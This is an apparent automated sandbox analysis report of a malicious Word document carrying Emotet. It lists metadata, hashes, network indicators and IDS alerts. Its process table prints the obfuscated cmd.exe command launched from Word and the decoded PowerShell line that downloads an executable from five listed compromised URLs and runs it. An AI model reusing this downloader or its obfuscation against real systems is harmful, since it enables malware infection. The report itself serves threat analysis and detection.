File name: | 914c0f87aef05aa403558d1825c3ef02.doc |
Full analysis: | https://app.any.run/tasks/56d6f60f-288a-4a2c-b357-cdd8cfc2380f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 12:56:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 07:32:00 2018, Last Saved Time/Date: Thu Dec 6 07:32:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 42, Security: 0 |
MD5: | 914C0F87AEF05AA403558D1825C3EF02 |
SHA1: | 5A6BBE6A47B8329C8F88EE7EBBE2E68F41808E93 |
SHA256: | D0A30F503C8A18A5D119B95B9544C294CB023D7287419B4FCC64A41E30EA21BA |
SSDEEP: | 3072:S8GhDS0o9zTGOZD6EbzCdQq3/I7ChQ1aL1C:8oUOZDlbeQqPIehQ1aL1C |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 48 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 42 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:06 07:32:00 |
CreateDate: | 2018:12:06 07:32:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\914c0f87aef05aa403558d1825c3ef02.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2444 | c:\djlHiiJvoFIViL\RzjPdOpBsDBQMi\YRLnzqw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3004 | CmD /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2632 | C:\Windows\system32\cmd.exe /S /D /c" echo $mGS='LNG';$fkc=new-object Net.WebClient;$XJL='http://marquisediamondengagementring.com/Rfg@http://omid1shop.com/2iyjzo@http://nhakhoaucchau.com.vn/riCIYlP8@http://nycfpf.com/2l0@http://mi.bmgu-dev.com/6ai'.Split('@');$jci='Xwo';$PXL = '697';$tza='hNY';$zXA=$env:temp+'\'+$PXL+'.exe';foreach($GNb in $XJL){try{$fkc.DownloadFile($GNb, $zXA);$iLV='WBw';If ((Get-Item $zXA).length -ge 80000) {Invoke-Item $zXA;$TXY='imK';break;}}catch{}}$Fpi='JpA';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2692 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=D.j tokens=2" %w IN ('ftype^|find "llDa"') DO %w -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3136 | C:\Windows\system32\cmd.exe /c ftype|find "llDa" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3388 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3488 | find "llDa" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1380 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D23.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\71E9Q7PCGNEP45J9YV8W.temp | — | |
MD5:— | SHA256:— | |||
3380 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B2A436A8C3D1FBC4316A1C780A4B85BD | SHA256:831EF4D2D350750F189D949F20BEEC0307F8F611932193B5D366BC53366AB189 | |||
1380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a435.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
1380 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$4c0f87aef05aa403558d1825c3ef02.doc | pgc | |
MD5:545860D457CBDFEC4FC916D63621C1A3 | SHA256:7C131F65135A4095057B0D3F26FDA08564941F746047D2BF067B02C1D1EEF12B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1380 | powershell.exe | GET | 404 | 144.76.170.98:80 | http://omid1shop.com/2iyjzo | DE | xml | 345 b | malicious |
1380 | powershell.exe | GET | 404 | 173.212.199.186:80 | http://mi.bmgu-dev.com/6ai | DE | xml | 345 b | malicious |
1380 | powershell.exe | GET | 404 | 45.77.241.211:80 | http://nhakhoaucchau.com.vn/riCIYlP8 | US | xml | 345 b | malicious |
1380 | powershell.exe | GET | 404 | 162.144.47.1:80 | http://nycfpf.com/2l0 | US | xml | 345 b | malicious |
1380 | powershell.exe | GET | 404 | 149.47.76.202:80 | http://marquisediamondengagementring.com/Rfg | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1380 | powershell.exe | 149.47.76.202:80 | marquisediamondengagementring.com | NEXCESS.NET L.L.C. | US | malicious |
1380 | powershell.exe | 144.76.170.98:80 | omid1shop.com | Hetzner Online GmbH | DE | malicious |
1380 | powershell.exe | 162.144.47.1:80 | nycfpf.com | Unified Layer | US | malicious |
1380 | powershell.exe | 45.77.241.211:80 | nhakhoaucchau.com.vn | — | US | malicious |
1380 | powershell.exe | 173.212.199.186:80 | mi.bmgu-dev.com | Contabo GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
marquisediamondengagementring.com |
| malicious |
omid1shop.com |
| malicious |
nhakhoaucchau.com.vn |
| malicious |
nycfpf.com |
| malicious |
mi.bmgu-dev.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1380 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1380 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1380 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1380 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1380 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |